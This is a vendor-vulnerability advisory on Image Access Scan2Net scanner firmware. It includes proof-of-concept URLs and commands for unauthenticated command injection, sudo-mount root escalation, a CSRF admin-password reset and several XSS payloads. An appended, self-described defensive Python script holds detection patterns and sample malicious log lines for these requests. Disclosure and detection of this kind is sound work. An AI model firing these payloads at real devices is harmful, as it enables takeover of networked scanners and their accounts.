SEC Consult Vulnerability Lab Security Advisory < 20241204-0 >
=======================================================================
              title: Multiple Critical Vulnerabilities
            product: Image Access Scan2Net
 vulnerable version: Firmware <=7.40, <=7.42, <7.42B (depending on the vulnerability)
      fixed version: mostly fixed in v7.42B
         CVE number: CVE-2024-28138, CVE-2024-28139, CVE-2024-28140
                     CVE-2024-28141, CVE-2024-28142, CVE-2024-28143
                     CVE-2024-28144, CVE-2024-28145, CVE-2024-28146
                     CVE-2024-47946, CVE-2024-47947, CVE-2024-36498
                     CVE-2024-36494, CVE-2024-50584
             impact: critical
    vendor homepage: https://www.imageaccess.de/?page=SoftwareScan2Net&lang=en
       advisory URL: https://r.sec-consult.com/imageaccess
              found: 2023-06-22
                 by: Daniel Hirschberger (Office Bochum)
                     Tobias Niemann (Office Bochum)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business
                     Europe | Asia

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Scan2Net® - The Ultimate Scanning Technology
- Better than just another client software package
- Integrates into existing networks without additional drivers or PCs
- Unrivaled performance, highest security, low connectivity cost

The Scan2Net® platform is the technological foundation of all WideTEK® and
Bookeye® scanners from Image Access. It replaces the proprietary scanner
drivers and software that traditional scanners require with the fastest
common, nonproprietary connection available: TCP/IP over Ethernet. With
network interface speeds much higher than USB or SCSI, Scan2Net devices are
able to reach unrivaled performance at very low connectivity cost. The Linux
based operating system is dedicated to scanner specific imaging and
mechanical control tasks, further maximizing scanning speeds and
performance."
Source: https://www.imageaccess.de/?page=SoftwareScan2Net&lang=en

Business recommendation:
------------------------
The vendor provides a firmware update to version 7.42B which should be
installed immediately.

SEC Consult could only partially verify the correction of all identified
vulnerabilities. Some vulnerabilities have not been fixed by the vendor as
the risk was accepted.

SEC Consult highly recommends performing a thorough security review of the
product conducted by security professionals to identify and resolve
potential further security issues.

Vulnerability overview/description:
-----------------------------------
1) OS Command Injection (CVE-2024-28138)
An unauthenticated attacker with network access to the scanner can execute
any system command via the "msg_events.php" script as the www-data user.

2) Privilege Escalation (CVE-2024-28139)
The www-data user can elevate its privileges because sudo is configured to
allow the execution of the mount command as root without a password.
Therefore, the privileges can be escalated to the root user.

3) Violation of Least Privilege Principle (CVE-2024-28140)
The scanner boots into a kiosk mode by default and opens the Scan2Net
interface in a browser window. This browser is run with the permissions of
the root user. There are also several other applications running as root
user, some of them self-developed, but those could not be exploited at first
glance.

4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141)
The web application is not protected against cross-site request forgery
attacks. Therefore, an attacker can trick users into performing actions on
the application when they visit an attacker-controlled website or click on a
malicious link.

5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947)
Due to missing input sanitization, an attacker can perform cross-site
scripting attacks and run arbitrary JavaScript in the browser of other users.
6) Insecure Password Change Function (CVE-2024-28143)
The password change function does not require the current password, which
makes the application vulnerable to account takeover, especially if combined
with the CSRF vulnerability.

7) Broken Access Control (CVE-2024-28144)
Due to missing access control on the reboot and shutdown functions, an
attacker can perform a denial-of-service attack against the application.
Furthermore, an attacker who can spoof the IP address and the User-Agent of a
logged-in user can take over the session because of flaws in the
self-developed session management.

8) Unauthenticated SQL Injection (CVE-2024-28145)
An unauthenticated attacker can perform an SQL injection by accessing the
dbconnector.php file and supplying malicious GET parameters.

9) Hard-coded Credentials (CVE-2024-28146)
The application uses several hard-coded credentials for protecting the
firmware update file and the installed database server.

Update 2024-04-02:
------------------
ImageAccess GmbH provided us with an internet-facing test device and we spent
a short time verifying the vulnerabilities in their latest firmware (7.40)
which should fix the security issues according to the vendor. Unfortunately,
most of them are still present and new ones have been discovered.

In short:

1) OS Command Injection (CVE-2024-28138, CVE-2024-47946)
Fixed, but a new RCE vulnerability has been discovered which requires a
session as Poweruser, updated PoC below. The second RCE issue is tracked as
CVE-2024-47946.

2) Privilege Escalation (CVE-2024-28139)
Still an issue.

3) Violation of Least Privilege Principle (CVE-2024-28140)
Still an issue.

4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141)
Fixed. The introduced "session_id" cookie is protected with the
"SameSite=Strict" cookie flag. This prevents CSRF attacks.
5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498)
Original issues are fixed (CVE-2024-28142, CVE-2024-47947), but we discovered
a new one, updated PoC below. The new XSS is tracked as CVE-2024-36498.

6) Insecure Password Change Function (CVE-2024-28143)
Fixed. The password change function now requires the current password.

7) Broken Access Control (CVE-2024-28144)
Still an issue. If two users access the web interface from the same IP they
are logged in as the other user. Updated PoC below.

8) Unauthenticated SQL Injection (CVE-2024-28145, CVE-2024-50584)
Original issue fixed, but a new blind SQLi as Poweruser has been found,
updated PoC below. The new SQLi is tracked as CVE-2024-50584.

9) Hard-coded Credentials (CVE-2024-28146)
Still an issue, credentials can be found in different files.

Update 2024-10-14:
------------------
ImageAccess GmbH provided us with an internet-facing test device and we spent
a short time verifying the vulnerabilities in their latest firmware (7.42)
which should fix the submitted critical security issues according to the
vendor.

1) OS Command Injection (CVE-2024-28138, CVE-2024-47946)
The new RCE vulnerability is fixed now.

2) Privilege Escalation (CVE-2024-28139)
Still an open issue. The risk has been accepted by the vendor because the
other critical issues are fixed and shell access is not easily possible
anymore.

3) Violation of Least Privilege Principle (CVE-2024-28140)
The kiosk browser is no longer running as root but many other custom services
still are.

4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141)
Fixed.

5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498, CVE-2024-36494)
The third XSS (CVE-2024-36498) has also been fixed. We discovered a new XSS
vulnerability in the login page which only works if the target user is _not_
already logged in, which makes it ideal for login form phishing attempts. The
new XSS is tracked as CVE-2024-36494.
6) Insecure Password Change Function (CVE-2024-28143)
Fixed. The password change function now requires the current password.

7) Broken Access Control (CVE-2024-28144)
Still an issue.

8) Unauthenticated SQL Injection (CVE-2024-28145, CVE-2024-50584)
The blind SQLi as Poweruser has been fixed.

9) Hard-coded Credentials (CVE-2024-28146)
Mostly fixed. Many credentials can be found in different files. The most
problematic 'support' user had their password rotated and it was not
immediately obvious where it is stored now.

Proof of concept:
-----------------
1) OS Command Injection (CVE-2024-28138, CVE-2024-47946)
An unauthenticated attacker with network access can execute arbitrary
commands by visiting the following URL. The HTTP GET parameter "data" is not
properly sanitized:

https://$SCANNER/class/msg_events.php?action=writemsgfifo&data=;$COMMAND

For example, the following URL can be used to display information about the
current user of the web server:

https://$SCANNER/class/msg_events.php?action=writemsgfifo&data=;id

The following image shows the output of the command:
<01_os_command_injection.png>

Update 2024-04-02:
------------------
The second issue is now tracked as CVE-2024-47946.

The OS command injection as shown above is no longer possible in the new
firmware version 7.40. Another possibility to gain remote code execution has
been identified if the attacker has access to a valid Poweruser session.

Specifically crafted valid PNG files with injected PHP content can be
uploaded as desktop backgrounds or lock screens. After the upload, the PHP
script is available in the web root. The PHP script executes once the
uploaded file is accessed. This allows the execution of arbitrary PHP code
and OS commands on the device as "www-data".
<01_os_command_injection_new.png>

2) Privilege Escalation (CVE-2024-28139)
By executing the command "sudo -l" as the www-data user, it is apparent that
this user can be used to escalate privileges to root, as shown in the
following figure:
<02-sudo-L.png>

The following commands can be executed to elevate to root privileges, as
shown in the following figure:

> sudo mount -o bind /usr/bin/bash /usr/bin/mount
> sudo mount

<02-sudo_mount.png>

3) Violation of Least Privilege Principle (CVE-2024-28140)
Many processes are running with root privileges which violates the principle
of Least Privilege. This can be confirmed by running "ps aux" as the root
user and observing the output:

root  /opt/s2n/bin/S2NBrowserV7 --no-sandbox StartUpSelection.html x:0 y:800 w:1920 h:1080
root   \_ /usr/lib/x86_64-linux-gnu/qt5/libexec/QtWebEngineProcess --type=zygote --no-sandbox --lang=en-US
root   \_ /usr/lib/x86_64-linux-gnu/qt5/libexec/QtWebEngineProcess --type=zygote --no-sandbox --lang=en-US
[...]

Apart from the browser, the following binaries are also run with root
permissions: vsftpd, smbd, wsdd.py, X11, OpenBox, and s2n-specific binaries
(copyd, s2ncopy, ocrd, imaged, camd_ucc1, admind, s2nwdd, ledd, wt36keyb, ...).

4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141)
The application offers no protection against Cross-Site Request-Forgery. An
attacker can therefore forge malicious links to reset the admin password or
create new users.

4.1) Reset Admin Password
The following link resets the password of the administrator to the value
"CSRF2YOU!". The password is base64-encoded (Q1NSRjJZT1Uh).

https://$SCANNER/cgi/admin.cgi?-rsetpass+-aaction+-1Q1NSRjJZT1Uh+-2adm

4.2) Register a new user
The following code can be hosted on a malicious page controlled by the
attacker. When a user who is logged in as administrator is lured by the
attacker to visit this page, a new user "SECtest" with the password
"CSRF2YOU!" is automatically created:
The following image shows the result:
<04_register_user.png>

5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498, CVE-2024-36494)
There are at least two identified injection points:

5.1) Scenario 1: Stored XSS via User Settings -> File Name (CVE-2024-28142)
a. Login as Scan2Net User.
b. Navigate to User Settings -> File Name
   (https://$SCANNER/cgi/uset.cgi?-cfilename)
c. Edit the "Wildcard Character" %2 setting to contain the following payload
   and reference it in the file name:
   >
   <05-1_xss_scenario_1.png>
d. The JavaScript payload will be saved automatically.
e. The payload will be triggered on each visit of the User Settings -> File
   Name page. It is also executed when an admin visits the following page:
   https://$SCANNER/cgi/uset.cgi?-cfilename
   <05-2_xss_scenario_1_triggered.png>

This attack can even be performed without being logged in because the
affected functions are not fully protected. Without logging in, only the file
name parameter of the "Default" User can be changed. However, the wildcards
can be changed without authentication. To inject the payload, the following
two requests have to be submitted.

I. Changing the file name of the "Default" user to scan_xss%2.pdf:
https://$SCANNER/cgi/chopt.cgi?uset+save_filename+scan_xss%252.pdf+filename+Default

II. Changing the Wildcard %2 to the JavaScript payload:
https://$SCANNER/cgi/chopt.cgi?fileabb+fileabb_customvalue2+%3Cscript%3Ealert(document.location)%3C/script%3E

5.2) Scenario 2: Stored XSS via the ScanWizard Disclaimer (CVE-2024-47947)
The "Edit Disclaimer Text" function of the configuration menu is also
vulnerable. Only the users Poweruser and Admin can use this function which is
available at the URL https://$SCANNER/cgi/admin.cgi?-rdisclaimer+-apre

The JavaScript can be inserted as shown in this image:
<05-3_xss_scenario_2_insertion.png>

Afterwards, this change has to be applied by clicking on the "Apply" button.
From now on the payload will be executed every time the ScanWizard is loaded.
The URL of the ScanWizard interface is:
https://$SCANNER/ScanWizard.html
<05-4_xss_scenario_2_trigger_browser.png>

This also includes the ScanWizard which is displayed in the Kiosk-mode
browser which is present on the physical touch-enabled display of the
scanner itself.
<05-4_xss_scenario_2_trigger_touch.png>

Update 2024-04-02:
------------------
The third issue is now tracked as CVE-2024-36498.

The following text can be inserted as Poweruser into the disclaimer to
exploit this issue:
%3c%53%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%53%63%72%69%70%74%3e

This is the payload URL-encoded.

Update 2024-10-14:
------------------
The fourth issue is now tracked as CVE-2024-36494.

A new reflected XSS, which only works on unauthenticated targets, has been
found:
https://$SCANNER/cgi/slogin.cgi?-tsetup+-uuser%22%20onfocus%3ddocument.body.innerHTML%2B%3dlocation.hash,document.body.innerHTML%2b%3ddocument.body.innerText%20autofocus%20b%3d#
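For defenders who cannot update immediately, the request patterns from the PoCs above (msg_events.php command injection, admin.cgi password reset, chopt.cgi wildcard injection, slogin.cgi reflected XSS) can be matched against the scanner's web server access log. The script below is an added example, not part of this advisory or of the vendor's software; the log lines, IP addresses and timestamps are constructed samples in combined log format.

```python
import re
from urllib.parse import unquote

# Request patterns taken from the PoC URLs in this advisory. Matching is done
# on the URL-decoded request URI so that %3C / %22 style encoding is caught.
RULES = [
    ("CVE-2024-28138 OS command injection via msg_events.php",
     re.compile(r"/class/msg_events\.php\?.*action=writemsgfifo.*data=[^&]*[;|`$]", re.I)),
    ("admin.cgi password reset (check Referer, CVE-2024-28141 CSRF)",
     re.compile(r"/cgi/admin\.cgi\?-rsetpass", re.I)),
    ("CVE-2024-28142 script tag in wildcard value via chopt.cgi",
     re.compile(r"/cgi/chopt\.cgi\?fileabb\+fileabb_customvalue\d.*<\s*script", re.I)),
    ("CVE-2024-36494 event handler injected into slogin.cgi",
     re.compile(r"/cgi/slogin\.cgi\?.*[\"']\s*on\w+\s*=", re.I)),
]

# Combined log format: ip ident user [time] "METHOD uri proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})')

def scan_line(line: str):
    """Return a finding dict for a matching log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode up to three times: the advisory's wildcard PoC uses double
    # encoding (%252 -> %2) and a single unquote would miss nested payloads.
    uri = m.group("uri")
    for _ in range(3):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    for name, rx in RULES:
        if rx.search(uri):
            return {"src": m.group("ip"), "ts": m.group("ts"), "rule": name, "uri": m.group("uri")}
    return None

def scan_log(lines):
    return [hit for hit in map(scan_line, lines) if hit]

# Constructed sample log (not real scanner output): four malicious requests,
# then two benign ones that must not trigger.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Jun/2023:10:01:02 +0200] "GET /class/msg_events.php?action=writemsgfifo&data=;id HTTP/1.1" 200 512',
    '10.0.0.5 - - [22/Jun/2023:10:02:10 +0200] "GET /cgi/admin.cgi?-rsetpass+-aaction+-1Q1NSRjJZT1Uh+-2adm HTTP/1.1" 200 88',
    '10.0.0.7 - - [22/Jun/2023:10:03:44 +0200] "GET /cgi/chopt.cgi?fileabb+fileabb_customvalue2+%3Cscript%3Ealert(document.location)%3C/script%3E HTTP/1.1" 200 12',
    '10.0.0.9 - - [22/Jun/2023:10:04:00 +0200] "GET /cgi/slogin.cgi?-tsetup+-uuser%22%20onfocus%3dalert(1)%20autofocus%20b%3d HTTP/1.1" 200 4096',
    '10.0.0.2 - - [22/Jun/2023:10:05:00 +0200] "GET /ScanWizard.html HTTP/1.1" 200 20480',
    '10.0.0.2 - - [22/Jun/2023:10:06:00 +0200] "GET /class/msg_events.php?action=writemsgfifo&data=scanready HTTP/1.1" 200 2',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']}  {hit['src']:<10} {hit['rule']}")
```

The admin.cgi rule also fires on legitimate password changes, so treat it as a review trigger and correlate with the Referer header and session rather than as a confirmed attack.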